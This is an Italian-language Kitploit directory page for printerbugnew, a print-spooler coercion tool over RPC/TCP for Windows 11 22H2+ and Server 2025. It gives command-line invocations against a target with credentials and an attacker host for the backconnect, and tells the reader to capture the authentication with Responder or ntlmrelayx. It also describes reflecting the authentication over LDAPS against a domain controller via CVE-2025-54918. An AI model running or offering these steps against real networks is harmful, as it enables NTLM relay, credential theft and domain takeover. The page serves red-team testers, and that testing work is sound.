Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
printerbugnew — La versione printerbug.py solo DCERPC | Kitploit
Strumenti/GitHubGitHub/decoder-it/printerbugnew
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitMovimento LateralePenetration TestingCommand and ControlAutenticazioneRed Teaming
GitHubdecoder-it/printerbugnew

printerbugnew

La versione printerbug.py solo DCERPC

Vedi Repository
23326210 mesi faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Trigger per Spooler di stampa con RPC puro su TCP

Per Windows 11 22H2+ / Windows Server 2025

Utilizzo

root@kitploit:~
printerbugnew.py <target_host> [username] [password] [domain] [attacker_host] [tcp_port]

Esempi

Connessione anonima

root@kitploit:~
printerbugnew.py 192.168.1.100

Con credenziali

root@kitploit:~
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN

Attiva backconnect verso un host diverso (attaccante)

root@kitploit:~
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN 192.168.1.50

Usa una porta RPC specifica

root@kitploit:~
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN 192.168.1.50 49152

Note

  • Il target deve essere Windows 11 22H2+ o Server 2025 (RPC su TCP predefinito)
  • Per le versioni precedenti, spoolss usa RPC su Named Pipes (SMB)
  • Assicurati che le porte 135 e le porte RPC dinamiche (49152-65535) siano aperte
  • Avvia Responder o ntlmrelayx su attacker_host per catturare l'autenticazione
  • In questo caso Kerberos fallisce a causa di uno SPN errato dello spooler, forzando il fallback a NTLM.
  • Trova la porta RPC/TCP dello spooler del target interrogando l'Endpoint Mapper (EPM) del target sulla TCP/135 per l'interfaccia UUID 12345678-1234-abcd-ef00-0123456789ab. Puoi usare rpcdump.py, PortQry o qualsiasi strumento preferisci - oppure implementa direttamente la ricerca EPM in questo codice ;)
  • Basato su https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py

    image

    image

    image

Aggiornamento per CVE-2025-54918

Questo exploit tramite reflection funziona solo su W2025 con il "nuovo" printerbug (DCERPC invece di Named Pipes). Dovrai modificare ntlmrelayx in un paio di punti perché funzioni. Dopo di che, puoi attivare remotamente il printer bug su un DC W2025 e riflettere l'autenticazione via LDAPS(!), anche se Channel Bindings è OBBLIGATORIO

ldaprelayclient.py:
image
rpcrelayserver.py
image

e relay ;)
image


La vulnerabilità è stata corretta nel Patch Tuesday di settembre 2025: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54918

La correzione garantisce che il MIC sia sempre calcolato, anche quando il messaggio di Tipo 3 è vuoto.

Grazie all'autore di questa CVE per un prezioso suggerimento :)

Scarica lo strumento